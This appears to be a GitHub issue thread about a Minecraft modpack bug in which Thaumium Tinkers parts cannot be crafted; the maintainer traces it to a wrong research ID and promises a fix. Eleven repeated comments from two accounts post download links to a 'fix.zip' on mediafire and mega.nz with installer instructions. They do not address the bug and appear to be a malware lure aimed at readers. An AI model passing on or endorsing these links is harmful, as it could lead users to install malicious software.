### ISSUE TITLE
TC4+ Tinkers | Thaumium parts uncraftable? 

### ISSUE THREAD

**Issue by S0ndz** [DrParadox7/Lost-Era-Modpack#109]
### Your Pack Version

1.6.7

### Type of Instance

Multiplayer

### Your Expectation

Assumed that I would get the needed thaumium tinkers tool parts recipes after unlocking thaumium in the thauminomicon. 

### The Reality

Thaumium parts remain uncraftable, unknowable UNLESS all research is given via cheat command. The recipe is not listed in the Thaumonomicon. Installing the TC4 NEI Plugin reveals that the part is uncraftable. Giving all research via the thaumcraft research player all command shows the correct TC4 recipe (putting the iron part in a crucible).

### Your Proposal

If Thaumium Tinkers Parts are hidden behind further research, please clearly state so in the quest book. If Thaumium parts should become knowable after researching Thaumium in the Thaumonomicon, then this seems to be a bug? 

### Final Checklist

- [X] I have searched this issue tracker and there is nothing similar already.
- [X] I can reproduce this problem consistently by follow the exact steps I described above, or this does not need reproducing, e.g. recipe loophole.

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by DrParadox7** [comment]
The parts erroneously need the research ID'ed as "TRANSIRON" which is thaumcraft's vanilla "Metal Transmutation" recipe.
This unlocks the crafting of the parts via cauldron:
![Thaumium](https://github.com/user-attachments/assets/20b398ed-a437-4d42-bf2c-5176a08ff54e)

I'll fix that next update.

> Installing the TC4 NEI Plugin reveals that the part is uncraftable.

That comes included in the modpack, so either that's a modified version or a different pack.
